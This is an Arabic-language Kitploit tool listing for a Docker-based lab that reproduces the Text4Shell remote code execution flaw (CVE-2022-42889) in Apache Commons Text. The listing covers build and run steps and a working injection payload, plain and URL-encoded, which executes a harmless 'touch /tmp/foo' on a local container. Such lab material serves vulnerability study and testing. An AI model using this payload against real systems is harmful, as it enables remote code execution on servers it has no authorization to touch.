Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-42889-text4shell — بيئة مختبرية مبنية على Docker لإعادة إنتاج واختبار ثغرة تنفيذ التعليمات البرمجية عن بعد CVE-2022-42889 (Text4Shell) في Apache Commons Text. | Kitploit
أدوات/GitHubGitHub/dimamend/cve-2022-42889-text4shell
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubdimamend/cve-2022-42889-text4shell

cve-2022-42889-text4shell

بيئة مختبرية مبنية على Docker لإعادة إنتاج واختبار ثغرة تنفيذ التعليمات البرمجية عن بعد CVE-2022-42889 (Text4Shell) في Apache Commons Text.

عرض المستودع
2منذ 20 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تثبيت maven - maven-linux


  1. قم بتثبيت Maven لإنشاء الجرة الكبيرة (fat jar)
root@kitploit:~
mvn clean install
  1. بناء Docker
root@kitploit:~
docker build --tag=text4shell .
  1. تشغيل Docker
root@kitploit:~
docker run -p 80:8080 text4shell
  1. اختبر التطبيق
root@kitploit:~
http://localhost/text4shell/attack?search=<anything>
  1. يمكن تنفيذ الهجوم عن طريق تمرير سلسلة نصية من الشكل ${prefix:name} حيث أن prefix هو البحث المذكور آنفًا:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. يمكنك أيضًا تجربة استخدام بادئات dns أو url.

  2. احصل على معرف الحاوية

root@kitploit:~
docker container ls
  1. ادخل إلى التطبيق
root@kitploit:~
docker exec -it <container_id> bash
  1. للتحقق من نجاح الهجوم (يجب أن ترى ملفًا باسم foo تم إنشاؤه في المجلد /tmp):
root@kitploit:~
ls /tmp/
  1. لإيقاف الحاوية
root@kitploit:~
docker container stop <container_id>
تنزيل الأداة